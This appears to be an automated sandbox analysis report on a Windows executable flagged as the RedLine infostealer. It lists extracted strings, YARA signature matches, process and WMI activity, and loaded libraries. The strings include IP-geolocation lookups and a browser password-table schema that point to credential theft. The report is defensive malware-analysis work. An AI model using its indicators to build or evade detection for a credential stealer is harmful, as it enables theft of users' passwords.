Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: UzQWEAhf9B.exe, UzQWEAhf9B.exe, 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: UzQWEAhf9B.exe	String found in binary or memory: https://api.ipify.
Source: UzQWEAhf9B.exe	String found in binary or memory: https://api.ipify.orgcoo
Source: UzQWEAhf9B.exe, UzQWEAhf9B.exe, 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UzQWEAhf9B.exe, UzQWEAhf9B.exe, 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.UzQWEAhf9B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 4.2.UzQWEAhf9B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: UzQWEAhf9B.exe PID: 5908, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: UzQWEAhf9B.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

.NET source code contains very large array initializations

Source: 0.2.UzQWEAhf9B.exe.2f029a8.0.raw.unpack, SizeParameters.cs	Large array initialization: : array initializer size 15921
Source: 0.2.UzQWEAhf9B.exe.56d0000.5.raw.unpack, SizeParameters.cs	Large array initialization: : array initializer size 15921

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_0151DEA4	0_2_0151DEA4
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D310B8	0_2_02D310B8
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D33158	0_2_02D33158
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D33168	0_2_02D33168
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D32750	0_2_02D32750
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D32760	0_2_02D32760
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D30848	0_2_02D30848
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D37E28	0_2_02D37E28
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D30C80	0_2_02D30C80
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_053B7020	0_2_053B7020
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_053B7010	0_2_053B7010
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_053B0006	0_2_053B0006
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_053B0040	0_2_053B0040
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_053BEF62	0_2_053BEF62
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_02C9E7B0	4_2_02C9E7B0
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_02C9DC90	4_2_02C9DC90
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_06799628	4_2_06799628
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_06794468	4_2_06794468
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_06793460	4_2_06793460
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_06791210	4_2_06791210
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_0679DD00	4_2_0679DD00
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_0679ED88	4_2_0679ED88
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_0679D108	4_2_0679D108
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_07C91A88	4_2_07C91A88
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_07C93890	4_2_07C93890
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_07C94000	4_2_07C94000
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_082738A0	4_2_082738A0
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_082718C0	4_2_082718C0
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08273188	4_2_08273188
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_082741D8	4_2_082741D8
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08270870	4_2_08270870
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_082718B0	4_2_082718B0
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08270880	4_2_08270880
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08273162	4_2_08273162
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08279340	4_2_08279340
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08279350	4_2_08279350
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08271470	4_2_08271470
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_08271E4C	4_2_08271E4C

Source: UzQWEAhf9B.exe, 00000000.00000002.2059791035.00000000056D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000000.00000000.1980545524.0000000000A88000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefHQF.exe8 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000000.00000002.2058036481.00000000040BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000000.00000002.2057681556.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000000.00000002.2060099175.00000000058D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000000.00000002.2057681556.0000000002F26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000000.00000002.2056934235.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsedge.exe> vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $cq,\\StringFileInfo\\040904B0\\OriginalFilename vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe, 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs UzQWEAhf9B.exe
Source: UzQWEAhf9B.exe	Binary or memory string: OriginalFilenamefHQF.exe8 vs UzQWEAhf9B.exe

Source: UzQWEAhf9B.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.UzQWEAhf9B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 4.2.UzQWEAhf9B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: UzQWEAhf9B.exe PID: 5908, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: UzQWEAhf9B.exe PID: 6720, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: UzQWEAhf9B.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, QRC0Eokay1sBk15lnl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, QRC0Eokay1sBk15lnl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	Security API names: _0020.AddAccessRule
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, QRC0Eokay1sBk15lnl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/47@1/1

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UzQWEAhf9B.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Mutant created: \Sessions\1\BaseNamedObjects\BcqXWoYgEmsKUWhhIJHc

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7078.tmp

Jump to behavior

Source: UzQWEAhf9B.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: UzQWEAhf9B.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpAAF5.tmp.4.dr, tmp7089.tmp.4.dr, tmpAAF6.tmp.4.dr, tmp1EFA.tmp.4.dr, tmp57CF.tmp.4.dr, tmp57E1.tmp.4.dr, tmp57D0.tmp.4.dr, tmp57E2.tmp.4.dr, tmpAAD4.tmp.4.dr, tmp1EFB.tmp.4.dr, tmp7078.tmp.4.dr, tmpAAD5.tmp.4.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: UzQWEAhf9B.exe	ReversingLabs: Detection: 87%
Source: UzQWEAhf9B.exe	Virustotal: Detection: 39%

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

File read: C:\Users\user\Desktop\UzQWEAhf9B.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: cryptbase.dll	Jump to behavior
